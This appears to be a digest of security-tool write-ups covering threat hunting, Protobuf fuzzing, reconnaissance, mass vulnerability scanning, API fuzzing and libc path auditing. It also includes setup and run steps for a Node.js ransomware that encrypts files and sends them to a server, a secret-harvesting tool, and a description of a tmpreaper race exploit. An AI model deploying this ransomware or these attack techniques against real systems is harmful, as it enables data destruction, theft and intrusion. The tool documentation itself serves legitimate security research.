
TheTHE - Simple, Shareable, Team-Focused And Expandable Threat Hunting Experience


TheTHE is an environment intended to help analysts and hunters through the early stages of their work in an easier, unified and faster way. One of the major drawbacks when dealing with a hunt is collecting the information available across a high number of sources, both public and private.

All this information is usually scattered and sometimes even volatile. Perhaps at a certain point there is no information on a particular IOC (Indicator of Compromise), but that situation may change within a few hours and become crucial to the investigation. Based on our experience in threat hunting, we have created a free and open source framework that simplifies the early stages of the investigation by providing:

  • Server-client architecture: investigations may be shared among your team.
  • API keys are stored in a database and may be shared by a team from a single point.
  • Results are cached, so repeated API calls are avoided (see the sketch after this list).
  • Better feeding of your Threat Intelligence Platform: TheTHE lets you perform a prior investigation of your assets.
  • Easy plugins: whatever you need is easily embedded within the system.
  • Ideal for SOCs, CERTs or any team.
  • Automation of tasks and searches.
  • Rapid API processing of multiple tools.
  • Unification of information in a single interface, so that screenshots, spreadsheets, text files, etc. are not scattered.
  • Enrichment of the collected data.
  • Periodic monitoring of a given IOC in case new information or related movements appear.
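The caching behaviour can be pictured with a minimal sketch (illustrative only: lookup_ioc and api.example.com are hypothetical names, and TheTHE's real cache is backed by MongoDB rather than an in-memory dict):
import time

import requests

CACHE = {}          # stand-in for TheTHE's MongoDB-backed result cache
CACHE_TTL = 3600    # seconds before a cached result is considered stale

def lookup_ioc(plugin_name, ioc):
    """Return cached plugin results for an IOC; hit the API only on a cache miss."""
    key = (plugin_name, ioc)
    entry = CACHE.get(key)
    if entry and time.time() - entry["ts"] < CACHE_TTL:
        return entry["data"]  # cache hit: no repeated API call
    data = requests.get(f"https://api.example.com/{plugin_name}",
                        params={"q": ioc}, timeout=10).json()
    CACHE[key] = {"data": data, "ts": time.time()}
    return data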

TheTHE has a web interface where the analyst starts their work by entering IOCs that are sent to a backend, which automatically looks up each resource on the various configured platforms in order to obtain unified information from different sources and access related reports or data existing on them. Furthermore, any change in the analyzed resources is monitored. Everything is executed on a local system, without sharing information with third parties until that information is organized, linked, complete and synthesized. This way, if the information must later be analyzed on another platform (such as a Threat Intelligence Platform), it can be done in the most enriching way possible.

A complete Docker image is scheduled to be released soon; meanwhile you can play with the dev environment.

Install (development environment)
  • git clone ...

Creating a Python virtual environment (the venv module ships with Python 3, so no pip install is normally needed)
  • python3 -m venv venv

Build the Docker images
  • docker-compose build

Install node packages
  • cd frontend && npm install

Running (development environment)
Activate the Python virtual environment (from the project root):
source venv/bin/activate
You can open two terminal sessions (each with the virtual environment activated) or just run the following two commands in the background.
Backend:
watchmedo auto-restart -d tasks -p '*.py' -- celery -A tasks.tasks:celery_app worker -l info
gunicorn server.main:app --reload
Frontend (you won't be able to operate until a user is added to the system):
cd frontend
npm run serve

Setting up the initial account
You must open a session in MongoDB (remember, it runs in a Docker container):
docker exec -it thethe_mongo_1 /bin/bash
Log in to MongoDB (of course, you MUST change the docker-compose default passwords):
mongo -u MONGO_INITDB_ROOT_USERNAME -p MONGO_INITDB_ROOT_PASSWORD
Now, inside the mongo shell, switch to a database called "thethe":
use thethe
Create the "users" collection along with YOUR first user (note that the mongo shell method is insertOne, not pymongo's insert_one):
db.users.insertOne({"name": "YOUR_NAME", "password": "HASH"})
The hash is obtained from a Python interactive interpreter (assuming the Python env is activated and requirements.txt is installed):
from passlib.apps import custom_app_context as pwd_context
pwd_context.encrypt("yourpassword")
Copy the hash into the value of the password field. Done.
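Alternatively, the whole step can be done from Python. This is only a sketch, not part of TheTHE's documentation: it assumes pymongo is available and that the connection string matches your docker-compose credentials.
from passlib.apps import custom_app_context as pwd_context
from pymongo import MongoClient

# Adjust the credentials and host to your docker-compose values (assumption).
client = MongoClient("mongodb://MONGO_INITDB_ROOT_USERNAME:MONGO_INITDB_ROOT_PASSWORD@localhost:27017/")
db = client["thethe"]
db.users.insert_one({
    "name": "YOUR_NAME",
    "password": pwd_context.encrypt("yourpassword"),  # same passlib hash as above
})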

How to create a plugin for THETHE
Plugins act on one or more resources. A plugin may have a frontend counterpart written as a Vue (JavaScript) component. Plugins must register themselves to describe what they do.
When a plugin is launched, it may be queued in a Celery queue for background processing (or not, depending on the kind of task, action, etc.).
A plugin has the following structure:

Python plugin
A plugin in Python just describes the actions, description, name, category, etc. It must inherit from plugin_base/Plugin.
The plugin MUST be located in the server/plugins/ folder. Below is an extract of server/plugins/geoip.py:
RESOURCE_TARGET = [ResourceType.IPv4]

# Plugin Metadata {a description, if target is actively reached and name}
PLUGIN_DESCRIPTION = "Use a GeoIP service to geolocate an IP address"
PLUGIN_IS_ACTIVE = False
PLUGIN_NAME = "geoip"


class Plugin:
    description = PLUGIN_DESCRIPTION
    is_active = PLUGIN_IS_ACTIVE
    name = PLUGIN_NAME

    def __init__(self, resource, project_id):
        self.project_id = project_id
        self.resource = resource

    def do(self):
        resource_type = self.resource.get_type()

        try:
            to_task = {
                "ip": self.resource.get_data()["address"],
                "resource_id": self.resource.get_id_as_string(),
                "project_id": self.project_id,
                "resource_type": resource_type.value,
                "plugin_name": Plugin.name,
            }
            geoip_task.delay(**to_task)

        except Exception as e:
            tb1 = traceback.TracebackException.from_exception(e)
            print("".join(tb1.format()))

Celery task
Finally, the task is implemented as a Celery function, which gives us async results. It SHOULD be located in the tasks/tasks.py file with the proper Celery decorators:
@celery_app.task
def geoip_task(plugin_name, project_id, resource_id, resource_type, ip):
    try:
        query_result = geoip(ip)
        if not query_result:
            return

        # TODO: See if ResourceType.__str__ can be used for serialization
        resource_type = ResourceType(resource_type)
        resource = Resources.get(resource_id, resource_type)
        resource.set_plugin_results(
            plugin_name, project_id, resource_id, resource_type, query_result
        )

    except Exception as e:
        tb1 = traceback.TracebackException.from_exception(e)
        print("".join(tb1.format()))

Celery subtask
You MAY split the core functionality into an external module located in the tasks/subtasks folder.
def geoip(ip):
    try:
        URL = f"http://api.ipstack.com/{ip}?access_key={API_KEY}&format=1"
        response = urllib.request.urlopen(URL).read()
        return json.loads(response)

    except Exception as e:
        tb1 = traceback.TracebackException.from_exception(e)
        print("".join(tb1.format()))
        return None

Vue component
Finally, the frontend MIGHT know how to represent the results as a view. Since the system is designed to support dynamic loading of plugins, all the Vue components are loaded on demand via the DynamicComponent component.
Plugins must have an entry at frontend/src/components/templates/<plugin name>/index.vue
Here you deal with the presentation of the plugin's results. As an example (taking the GeoIP plugin):
<template>
  <v-layout row pt-2 wrap class="subheading">
    <v-flex lg5>
      <v-flex>
        <v-card>
          <v-card-title primary-title>
            <span class="subheading">Geolocalization</span>
          </v-card-title>
          <v-divider></v-divider>
          <v-card-text>
            <v-layout row>
              <v-flex lg-6 class="text-xs-left">
                <v-layout column>
                  <v-flex>
                    <v-label>Continent:</v-label>
                  </v-flex>
                  <v-flex>
                    <v-label>Country:</v-label>
                  </v-flex>
                  <v-flex>
                    <v-label>Region:</v-label>
                  </v-flex>
                  <v-flex>
                    <v-label>City:</v-label>
                  </v-flex>
                  <v-flex>
                    <v-label>Zip:</v-label>
                  </v-flex>
                  <v-flex>
                    <v-label>Latitude:</v-label>
                  </v-flex>
                  <v-flex>
                    <v-label>Longitude:</v-label>
                  </v-flex>
                  <v-flex v-if="resource.country_code">
                    <v-label>Flag:</v-label>
                  </v-flex>
                </v-layout>
              </v-flex>
              <v-flex lg-6 class="text-xs-right">
                <v-layout column>
                  <v-flex>{{ resource.continent_name }}</v-flex>
                  <v-flex>{{ resource.country_name }}</v-flex>
                  <v-flex>{{ resource.region_name }}</v-flex>
                  <v-flex>{{ resource.city }}</v-flex>
                  <v-flex>{{ resource.zip }}</v-flex>
                  <v-flex>{{ resource.latitude }}</v-flex>
                  <v-flex>{{ resource.longitude }}</v-flex>
                  <v-flex v-if="resource.country_code">
                    <country-flag :country="resource.country_code"></country-flag>
                  </v-flex>
                </v-layout>
              </v-flex>
            </v-layout>
          </v-card-text>
        </v-card>
      </v-flex>
    </v-flex>
  </v-layout>
</template>

<script>
import { make_unique_list } from "../../../utils/utils";

export default {
  name: "geoip",
  props: {
    plugin_results: Object
  },
  data: function() {
    return {};
  },
  computed: {
    resource: function() {
      let plugin_result = { ...this.plugin_results };
      return plugin_result;
    }
  }
};
</script>



Pbtk - A Toolset For Reverse Engineering And Fuzzing Protobuf-based Apps


Protobuf is a serialization format developed by Google and used in an increasing number of Android, web, desktop and more applications. It consists of a language for declaring data structures, which is then compiled to code or another kind of structure depending on the target implementation.
pbtk (Protobuf toolkit) is a full-fledged set of scripts, accessible through a unified GUI, that provides two main features:
  • Extracting Protobuf structures from programs, converting them back into readable .protos, supporting various implementations:
    • All the main Java runtimes (base, Lite, Nano, Micro, J2ME), with full Proguard support,
    • Binaries containing embedded reflection metadata (typically C++, sometimes Java and most other bindings),
    • Web applications using the JsProtoUrl runtime.
  • Editing, replaying and fuzzing data sent to Protobuf network endpoints, through a handy graphical interface that allows you to edit live the fields for a Protobuf message and view the result. 

Installation
PBTK requires Python ≥ 3.5, PyQt 5, Python-Protobuf 3, and a handful of executable programs (chromium, jad, dex2jar...) for running extractor scripts.
Archlinux users can install directly through the package:
$ yaourt -S pbtk-git
$ pbtk
On most other distributions, you'll want to run it directly:
# For Ubuntu/Debian testing derivatives:
$ sudo apt install python3-pip git openjdk-9-jre

$ sudo pip3 install protobuf pyqt5 requests websocket-client

$ git clone https://github.com/marin-m/pbtk
$ cd pbtk
$ ./gui.py
Windows is also supported (with the same modules required). Once you run the GUI, it should warn you on what you are missing depending on what you try to do.

Command line usage
The GUI can be launched through the main script:
./gui.py
The following scripts can also be used standalone, without a GUI:
./extractors/jar_extract.py [-h] input_file [output_dir]
./extractors/from_binary.py [-h] input_file [output_dir]
./extractors/web_extract.py [-h] input_url [output_dir]

Typical workflow
Let's say you're reverse engineering an Android application. You've explored the application a bit with your favorite decompiler and figured out that it transports Protobuf as POST data over HTTPS in a typical way.
You open PBTK and are greeted in a meaningful manner:


The first step is getting your .protos into text format. If you're targeting an Android app, dropping in an APK and waiting should do the magic work! (unless it's a really exotic implementation)


This being done, you jump to ~/.pbtk/protos/<your APK name> (either through the command line, or via the button at the bottom of the welcome screen that opens your file browser, whichever you prefer). All the app's .protos are indeed here.
Back in your decompiler, you stumble upon the class that constructs the data sent to the HTTPS endpoint that interests you. It serializes the Protobuf message by calling a class made of generated code.


This latter class should have a perfect match inside your .protos directory (i.e. com.foo.bar.a.b will match com/foo/bar/a/b.proto). Either way, grepping its name should let you find it.
That's great: the next thing is going to Step 2, selecting your desired input .proto, and filling some information about your endpoint.


You may also provide some sample raw Protobuf data that was sent to this endpoint, captured through mitmproxy or Wireshark, pasted in hex-encoded form (see the snippet below).
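If you captured the raw request body with mitmproxy or Wireshark, a one-liner is enough to produce that hex form; sample.bin below is a placeholder path for the exported bytes.
# Hex-encode a captured raw Protobuf body for pasting into PBTK.
with open("sample.bin", "rb") as f:
    print(f.read().hex())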
Step 3 is about the fun part of clicking buttons and seeing what happens! You have a tree view representing every field in the Protobuf structure (repeated fields are suffixed by "+", required fields don't have checkboxes).


Just hover over a field to give it focus. If the field is an integer type, use the mouse wheel to increment or decrement it. Enum information appears on hover too.
Here it is! You can determine the meaning of every field with that. If you extracted .protos out of minified code, you can rename fields according to what you notice they mean, by clicking their names.
Happy reversing!

Local data storage
PBTK stores extracted .proto information into ~/.pbtk/protos/ (or %APPDATA%\pbtk\protos on Windows).
You can move data in or out, rename, edit or erase it from this directory directly through your regular file browser and text editor; that's the expected way to do it and won't interfere with PBTK.
HTTP-based endpoints are stored into ~/.pbtk/endpoints/ as JSON objects. These objects are arrays of pairs of request/response information, which looks like this:
[{
    "request": {
        "transport": "pburl",
        "proto": "www.google.com/VectorTown.proto",
        "url": "https://www.google.com/VectorTown",
        "pb_param": "pb",
        "samples": [{
            "pb": "!....",
            "hl": "fr"
        }]
    },
    "response": {
        "format": "other"
    }
}]

Source code structure
PBTK uses two kinds of pluggable modules internally: extractors, and transports.
  • An extractor supports extracting .proto structures from a target Protobuf implementation or platform.
Extractors are defined in extractors/*.py. They are defined as a method preceded by a decorator, like this:
@register_extractor(name = 'my_extractor',
                    desc = 'Extract Protobuf structures from Foobar code (*.foo, *.bar)',
                    depends={'binaries': ['foobar-decompiler']})
def my_extractor(path):
    # Load contents of the `path` input file and do your stuff...

    # Then, yield extracted .protos using a generator:
    for i in do_your_extraction_work():
        yield proto_name + '.proto', proto_contents

    # Other kinds of information can be yielded, such as endpoint information or progress to display.
  • A transport supports a way of deserializing, reserializing and sending Protobuf data over the network. For example, the most commonly used transport is raw POST data over HTTP.
Transports are defined in utils/transports.py. They are defined as a class preceded by a decorator, like this:
@register_transport(
    name = 'my_transport',
    desc = 'Protobuf as raw POST data',
    ui_data_form = 'hex strings'
)
class MyTransport():
    def __init__(self, pb_param, url):
        self.url = url

    def serialize_sample(self, sample):
        # We got a sample of input data from the user.
        # Verify that it is valid in the form described through the "ui_data_form" parameter; fail with an exception or return False otherwise.
        # Optionally modify this data prior to returning it.
        bytes.fromhex(sample)
        return sample

    def load_sample(self, sample, pb_msg):
        # Parse input data into the provided Protobuf object.
        pb_msg.ParseFromString(bytes.fromhex(sample))

    def perform_request(self, pb_data, tab_data):
        # Perform a request using the provided URL and Protobuf object, and optionally other transport-specific side data.
        return post(self.url, pb_data.SerializeToString(), headers=USER_AGENT)


nodeCrypto v2.0 - Ransomware Written In NodeJs


nodeCrypto is a Linux ransomware written in Node.js that encrypts predefined files.
This project was created for educational purposes; you are solely responsible for any use of nodeCrypto.

Demo video


Install server
Upload all files from the server/ folder to your webserver.
Create a SQL database and import sql/nodeCrypto.sql.
Edit server/libs/db.php and add your SQL credentials.

Install and run
git clone https://github.com/atmoner/nodeCrypto.git
cd nodeCrypto && npm install
cd sources && npm install
cd .. && npm start
Once your configuration is complete, run the compilation.
You can then start the ransomware:
cd sources && ./output
The files at the root of the web server will be encrypted and sent to the server.

Screenshot




ReconCobra - Complete Automated Pentest Framework For Information Gathering


ReconCobra
  • ReconCobra is footprinting software for ultimate information gathering
  • Runs on Kali, Parrot OS, BlackArch, Termux and Android LED TVs

Interface
  • The software has 82 options, with full automation and powerful information gathering capabilities

In-Action








Brief Introduction
  • ReconCobra is useful for banks, private organisations and ethical hackers for legal auditing.
  • It serves as a defensive method for finding as much information as possible that could otherwise be used for gaining unauthorised access and intrusion.
  • With the emergence of more advanced technology, cybercriminals have also found more ways to get into the systems of many organizations.
  • ReconCobra can audit firewall behaviour, checking whether it leaks backend machines/servers or replies to pings. It can find internal and external networks where software such as ERPs and mail firewalls are installed, exposing servers. It performs as much footprinting, scanning and enumeration of the target as possible, to discover and collect information such as usernames, web technologies, files, endpoints, APIs and much more.
  • It's the first step to stopping cyber criminals: securing your infrastructure against information gathering leakage. ReconCobra is free of false positives: when there is something, it will show it no matter what; if there is nothing, it will give blank results rather than an error.

University Course
  • ReconCobra is now a part of International Hacking Trainings for OSINT
  • Cybersecurity365.com OSINT for Reconnaissance trainings for CEH, CISSP, Security+, ITPA

Integrations
  • Tigerman Root Software Package

Youtube Video

Kali Installation
  • git clone https://github.com/haroonawanofficial/ReconCobra.git
  • cd Reconcobra
  • sudo chmod u+x *.sh
  • ./Kali_Installer.sh
  • ReconCobra will integrate as system software
  • Dependencies will be handled automatically
  • Third party software(s)/dependencies/modules will be handled automatically

Parrot OS Installation
  • git clone https://github.com/haroonawanofficial/ReconCobra.git
  • cd Reconcobra
  • chmod u+x *.sh
  • bash ParrotOS_Installer.sh
  • ReconCobra will integrate as system software
  • Dependencies will be handled automatically
  • Third party software(s)/dependencies/modules will be handled automatically

Termux Installation
  • git clone https://github.com/haroonawanofficial/ReconCobra.git
  • cd Reconcobra
  • chmod u+x *.sh
  • pkg install proot
  • type: termux-chroot
  • ./Termux_Installer.sh
  • ./Termux_fixme.sh
  • Reboot your Termux
  • perl ReconCobraTermux.pl
  • Dependencies will be handled automatically for Termux
  • Third party software(s)/dependencies/modules will be handled automatically for Termux

Android Led TV Installation
  • Install termux
  • Input usb keyboard
  • git clone https://github.com/haroonawanofficial/ReconCobra.git
  • cd Reconcobra
  • chmod u+x *.sh
  • pkg install proot
  • type: termux-chroot
  • ./Termux_Installer.sh
  • ./Termux_fixme.sh
  • Reboot your Termux
  • perl ReconCobraTermux.pl
  • Dependencies will be handled automatically for Termux
  • Third party software(s)/dependencies/modules will be handled automatically for Termux

Black Arch Installation
  • Open an issue if an error occurs
  • git clone https://github.com/haroonawanofficial/ReconCobra.git
  • cd Reconcobra
  • chmod u+x *.sh
  • ./BlackArch_Installer.sh
  • ReconCobra will integrate as system software
  • Dependencies will be handled automatically
  • Third party software(s)/dependencies/modules will be handled automatically

Developer

Co-developer & Senior Tester
  • Arun S


    Secretx - Extracting API Keys And Secrets By Requesting Each URL In Your List


    Extract API keys and secrets by requesting each URL in your list.

    Installation
    python3 -m pip install -r requirements.txt

    Usage
    python3 secretx.py --list urlList.txt --threads 15

    optional arguments: --help --colorless

    Credits
    Thanks to @m4ll0k for the patterns and to @choudhary_1337 for inspiring the idea.


    Silver - Mass Scan IPs For Vulnerable Services


    masscan is fast, nmap can fingerprint software and vulners is a huge vulnerability database. Silver is a front-end that allows complete utilization of these programs by parsing data, spawning parallel processes, caching vulnerability data for faster scanning over time and much more.
    Note: Silver isn't compatible with Python 2.

    Features
    • Resumable scanning
    • Slack notifications
    • Multi-core utilization
    • Vulnerability data caching
    • Smart Shodan integration*
    *Shodan integration is optional, but when linked, Silver can automatically use Shodan to retrieve service and vulnerability data when a host has a lot of open ports, saving resources. The Shodan credits used per scan by Silver can be throttled, and the minimum number of open ports that triggers a Shodan lookup can be configured as well.

    Requirements

    Usage
    Note: Silver scans all TCP ports by default i.e. ports 0-65535.

    Scan host(s) from command line
    python3 silver.py 127.0.0.1
    python3 silver.py 127.0.0.1/22
    python3 silver.py 127.0.0.1,127.0.0.2,127.0.0.3

    Scan top ~1000 ports
    python3 silver.py 127.0.0.1 --quick

    Scan hosts from a file
    python3 silver.py -i /path/to/targets.txt

    Set max number of parallel nmap instances
    python3 silver.py -i /path/to/targets.txt -t 4

    Configuration
    Slack WebHook, Shodan API key and limits can be configured by editing respective variables in /core/memory.py
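    The snippet below only illustrates the shape such a configuration might take; the variable names are hypothetical, so open /core/memory.py and edit the real ones.
    # Hypothetical names -- the real variables are defined in /core/memory.py.
    slack_webhook = "https://hooks.slack.com/services/T00000000/B00000000/XXXX"
    shodan_api_key = "YOUR_SHODAN_API_KEY"
    shodan_min_ports = 100    # open-port count that triggers a Shodan lookup
    shodan_credit_limit = 10  # max Shodan credits to spend per scan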

    Setting up Slack notifications
    • Create a workspace on slack, here
    • Create an app, here
    • Enable WebHooks from the app and copy the URL from there to Silver's /core/memory.py file.

    Automatic API Attack Tool - Customizable API Attack Tool Takes An API Specification As An Input, Generates And Runs Attacks That Are Based On It As An Output


    Imperva's customizable API attack tool takes an API specification as an input, and generates and runs attacks that are based on it as an output.
    The tool is able to parse an API specification and create fuzzing attack scenarios based on what is defined in it. Each endpoint is injected with cleverly generated values within the boundaries defined by the specification, and outside of them; the appropriate requests are sent and their success or failure is reported in a detailed manner. You may also extend it to run various security attack vectors, such as illegal resource access, XSS, SQLi and RFI, targeted at the existing endpoints, or even at non-existing ones. No human intervention is needed: simply run the tool and get the results.
    The tool can be easily extended to meet various needs, such as those of a developer who wants to test their API, or an organization that wants to run regular vulnerability or positive-security scans on its public API. It is built with CI/CD in mind.

    Requirements
    • Java 8 or higher
    • Gradle

    Running
    • Check out the code from GitHub and run 'gradle build'
    • You may find the executable jar under the build/libs folder
    • Run 'java -jar imperva-api-attack-tool.jar' to see the help menu

    Making a Linux executable
    • Copy the runnable.sh file from the src/main/resources folder, to the same directory with the jar file.
    • Now run: 'cat runnable.sh imperva-api-attack-tool.jar > api-attack.sh && chmod +x api-attack.sh'
    • You may use the api-attack.sh file as a regular executable

    Usage

    Required parameters:
    -f, --specFile=specFilePath
    The API specification file (swagger 2.0) to run on. JSON/YAML format. For better results, make sure responses are well defined for each endpoint.
    -n, --hostName=hostName
    The host name to connect to. It can also be an IP
    -s, --hostScheme=hostScheme
    Connection to host will be made using this scheme; e.g: https or http

    Optional parameters:
    -p, --hostPort=hostPort
    The port the host is listening on for API calls, default is: 443
    -ph, --proxyHost=proxyHost
    Specify the proxy host to send the requests via a proxy
    -pp, --proxyPort=proxyPort
    The proxy port, default is: 80
    -rcn, --addNegativeRC=responseCode[,responseCode...]
    Additional response codes to be accepted in negative attacks (e.g. bad value attacks). Multiple values are supported, separated by commas
    -rcp, --addPositiveRC=responseCode[,responseCode...]
    Additional response codes to be accepted in positive checks (legitimate value attacks). Multiple values are supported, separated by commas


    Typical usage scenarios:
    • You'd like to check whether your API is protected by an API Security solution.
      Example run: api-attack.sh -f swaggerPetStore.json -n myapisite.com -s http -rcn=403
      We've added the 403 response code as a legitimate response code for the negative checks. This is since the API Security solution blocks such requests, and returns a 403 status. The spec, on the other hand, doesn't necessarily define such a response with HTTP code of 403, for any of its endpoints. This would make such responses legitimate, in spite of them not being in the spec, and alert you when such a response is not received from a negative check. Such cases mean that you are left unprotected by your API security solution.
    • You'd like to check how your proxy mitigates API attacks, but don't have an actual site behind it.
      Example run: api-attack.sh -f swaggerPetStore.json -n myapisite.com -s http -ph 127.0.0.1 -pp=4010 -rcn=403 -rcp=404
      This time we've added the 404 status code to the positive scenarios. So that when a scenario is not being blocked, we will not report a failure, but rather accept the legitimate 404 (resource not found) response.
    • You'd like to check whether your API handles all inputs correctly. Furthermore, you'd like to run it on a nightly basis, or even after each time a developer pushes new code to the project.
      Example run: api-attack.sh -f myapi_swagger.yaml -n staging.myorg.com -s https
      This time we're running without any exclusions. The API specification file must declare its response codes precisely. The tool will accept only them as legitimate, and will fail the checks otherwise. See more below on conditions of failing the checks. Run the above command in a Jenkins job (or any other CI/CD software to your liking), which will be triggered by a cron, or a repo code push activity. Make sure you have the TestNG plugin installed, which should parse the results written in build/testng-results, for better visibility in the CI/CD scenario.
    • You'd like to check whether this API might be open to fuzzing attempts. Simply run the tool and check the reported failures.
      Example run: api-attack.sh -f publiclyAvailableSwaggerOfAPI.yaml -n api.corporate.com -s https
    • You'd like to check whether your API is implemented correctly on the server side, or that its definition corresponds to the server implementation.
      Example run: api-attack.sh -f publiclyAvailableSwaggerOfAPI.yaml -n api.corporate.com -s https

    Conditions for failing checks
    • The tool verifies that the response code of each generated request matches the response codes declared in the swagger. However:
    • Positive checks: if the response is a clear error (5xx), we still fail the check even if this response code is not defined in the spec, unless you supplied an override.
    • Negative checks: if the response is not a legitimate error (i.e. it is 1xx, 2xx or 5xx), we fail the check unless you supplied an override. If the legitimate error code is not in the spec, the check fails as well.
    • You may use the 'default' definition in the response section of the swagger, but this is not recommended. Always define your legitimate answers precisely.
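    The rules above can be condensed into a small decision function. The sketch below is a Python paraphrase of the documented behaviour, not the tool's actual (Java) code; treating 3xx codes as non-errors in negative checks is an assumption.
    def check_passes(code, positive, spec_codes, overrides):
        # Codes added via -rcp/-rcn always count as accepted overrides.
        if code in overrides:
            return True
        if positive:
            # Positive checks: a 5xx always fails, even if declared in the spec.
            return code in spec_codes and code < 500
        # Negative checks: expect a legitimate, spec-declared error (4xx).
        return 400 <= code < 500 and code in spec_codes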


    Expected outputs:
    • The tool uses the testng reporting framework, so any plugin that handles testng runs can be used here. Only note that the results are written under the build/testng-results folder. This can be changed, of course.
    • The tool generates requests according to its check suites, and each request checks something specific. So each check will present all the relevant details in the command line output, together with what is being checked, what the response is, and whether or not it was as expected.
    • Any bad requests will be stored in the bad_requests folder, so that you can analyze them later (e.g. if this is running on a CI/CD server and you don't have immediate access to the machine)
    • In the end, you will be provided with a summary

    Example of a negative check that failed:
    ***** Testing API Endpoint *****
    ***** Test ID: 1575128763286-74212
    Testing: Bad Property: /username (STRING), value: {, URL encoded: %7B
    --> Url: /user/{
    --> Method: GET
    --> Headers: []
    ----------**----------
    Request was: GET /user/{ [Accept: application/json], Response status code: 200(UNEXPECTED)
    Response (non parsed):
    {"id":0,"username":"string","firstName":"string","lastName":"string","email":"string","password":"string","phone":"string","userStatus":0}
    Why did the check fail? The request got a 200, even though it didn't contain a legal URL.

    Another example:
    ***** Testing API Endpoint *****
    ***** Test ID: 1575128763286-25078
    Testing: Bad Property: /body/quantity (INTEGER), value: 0.4188493, URL encoded: 0.4188493
    --> Url: /store/order
    --> Method: POST
    --> Headers: []
    --> Body: {"petId":-2511515111206893939,"quantity":0.4188493,"id":698757161286106823,"shipDate":"�s","complete":"true","status":"approved"}
    ----------**----------
    Request was: POST /store/order [Accept: application/json], Response status code: 200(UNEXPECTED)
    Response (non parsed):
    {"id":0,"petId":0,"quantity":0,"shipDate":"2019-11-30T15:46:03Z","status":"placed","complete":false}
    The server expected to get an integer but accepted a double value. This might be a good spot to try to exploit a buffer overflow in the server.

    Example of a successful check:
    ***** Testing API Endpoint *****
    ***** Test ID: 1575128763137-43035
    Testing: /user/{username}
    --> Url: /user/%E68E97EDB4Oq-(!BbG,Y$p'A-KW%65f9FA6jt5vvDz-cW.QGsLS+AA~RIHC3wgy25lDJsGzcT.;kJ+(
    --> Method: GET
    --> Headers: []
    ----------**----------
    Request was: GET /user/%E68E97EDB4Oq-(!BbG,Y$p'A-KW%65f9FA6jt5vvDz-cW.QGsLS+AA~RIHC3wgy25lDJsGzcT.;kJ+( [Accept: application/json], Response status code: 404
    Response (non parsed):
    {"statusCode":404,"error":"Not Found","message":"Not Found"}
    We supplied a username that was nonexistent but legal according to the API specification. The server knew how to handle this request and returned a legal error.

    Supported Check Scenarios
    We will use the term endpoint here, as the endpoint URL and Method tuple.

    Positive Scenarios
    • For each endpoint, creates a request with generated values for all of its parameters. These are generated randomly, but obey the rules that are defined in the API specification.
    • For each endpoint, creates a request with only the required parameters, with values generated as described above.

    Negative Scenarios
    • For each endpoint, creates multiple requests, each of which checks a different parameter. The tool does this by injecting a random bad input value into the checked parameter and filling the rest with "positive" values generated in the same manner as described in the positive scenarios.

    Ongoing Effort
    We are working on migrating our other scenarios to the open-source tool, for the benefit of the community. Stay tuned for updates.

    Extensibility
    The tool is written in a way that makes it easy to extend its fuzzing and request generation functionality to meet your specific needs. Feel free to suggest any additions that others may benefit from by creating a pull request.


    PathAuditor - Detecting Unsafe Path Access Patterns


    The PathAuditor is a tool meant to find file access related vulnerabilities by auditing libc functions.
    The idea is roughly as follows:
    • Audit every call to filesystem related libc functions performed by the binary.
    • Check if the path used in the syscall is user-writable. In this case an unprivileged user could have replaced a directory or file with a symlink.
    • Log all violations as potential vulnerabilities.
    We're using LD_PRELOAD to hook all filesystem related library calls and log any encountered violations to syslog.
    This is not an officially supported Google product.
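    The check in step 2 can be sketched in a few lines of Python. This is a simplification for illustration only; the real check is done in C inside the LD_PRELOAD hook and handles sticky bits, ownership and more edge cases.
    import os
    import os.path

    def path_is_user_writable(path):
        """Rough check: is any existing path component non-root-owned or world-writable?"""
        path = os.path.abspath(path)
        while True:
            try:
                st = os.lstat(path)
                if st.st_uid != 0 or (st.st_mode & 0o002):
                    return True
            except FileNotFoundError:
                pass  # component does not exist (yet); skip it
            parent = os.path.dirname(path)
            if parent == path:  # reached "/"
                return False
            path = parent

    print(path_is_user_writable("/tmp/foo/bar"))  # /tmp is world-writable -> True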

    Example Vulnerability
    Let's look at an example of the kind of vulnerability that this tool can detect. CVE-2019-3461 was a bug in tmpreaper, a tool that traverses /tmp and deletes old files. It's usually run as a cron job as root. Since it doesn't want to delete files outside of tmp, it was using the following code to check if a directory is a mount point:
    if (S_ISDIR (sb.st_mode)) {
        char *dst;

        if ((dst = malloc(strlen(ent->d_name) + 3)) == NULL)
            message (LOG_FATAL, "malloc failed.\n");
        strcpy(dst, ent->d_name);
        strcat(dst, "/X");
        rename(ent->d_name, dst);
        if (errno == EXDEV) {
            free(dst);
            message (LOG_VERBOSE,
                     "File on different device skipped: `%s/%s'\n",
                     dirname, ent->d_name);
            continue;
        }
        // [...]
    In short, this code calls rename("/tmp/foo", "/tmp/foo/x") which will return EXDEV if "/tmp/foo" is a mount point. PathAuditor would flag this call as a potential vulnerability if "/tmp/foo" is owned by any user except root. To understand why, we have to think about what happens in the kernel when the rename syscall is executed (simplified):
    1. The kernel traverses the path "/tmp/foo" for the first argument.
    2. The kernel traverses the path "/tmp/foo/x" for the second argument.
    3. If the source and target are on different filesystems, return EXDEV.
    4. Otherwise, move the file from the first to the second directory.
    There's a race condition here since "/tmp/foo" will be resolved twice. If it's user-controlled, the user can replace it with a different file at any point in time. In particular, we want "/tmp/foo" to be a directory at first to pass the if(S_ISDIR) check in the tmpreaper code. We then replace it with a file just before the code enters the syscall. When the kernel resolves the first argument, it will see a file with user-controlled content. Now we replace it again, this time with a symlink to an arbitrary directory on the same filesystem. The kernel will resolve the path a second time, follow the symlink and move the controlled file to a chosen directory.
    The same-filesystem restriction exists because rename does not work between filesystems. But on some Linux distributions /tmp is just a folder on the rootfs by default, and you could use this bug to move a file to /etc/cron, which will get executed as root.

    How to run
    To try it out, you need to build libpath_auditor.so with bazel and load it into a binary using LD_PRELOAD. Any violations will be logged to syslog, so make sure that you have it running.
    bazel build //pathauditor/libc:libpath_auditor.so
    LD_PRELOAD=/path/to/bazel-bin/pathauditor/libc/libpath_auditor.so cat /tmp/foo/bar
    tail /var/log/syslog
    It's also possible to run this on all processes on the system by adding it to /etc/ld.so.preload. Though be warned that this is only recommended on test systems as it can lead to instability.
    As a quickstart, you can try out the docker container shipped with this project:
    docker build -t pathauditor-example .
    docker run -it pathauditor-example
    # LD_PRELOAD=/pathauditor/bazel-bin/pathauditor/libc/libpath_auditor.so cat /tmp/foo/bar
    # cat /var/log/syslog



    Lazyrecon - Script To Automate Your Reconnaissance Process In An Organized Fashion


    LazyRecon is a script written in Bash that automates some tedious reconnaissance and information gathering tasks. It gathers information that should help you identify what to do next and where to look.

    Usage
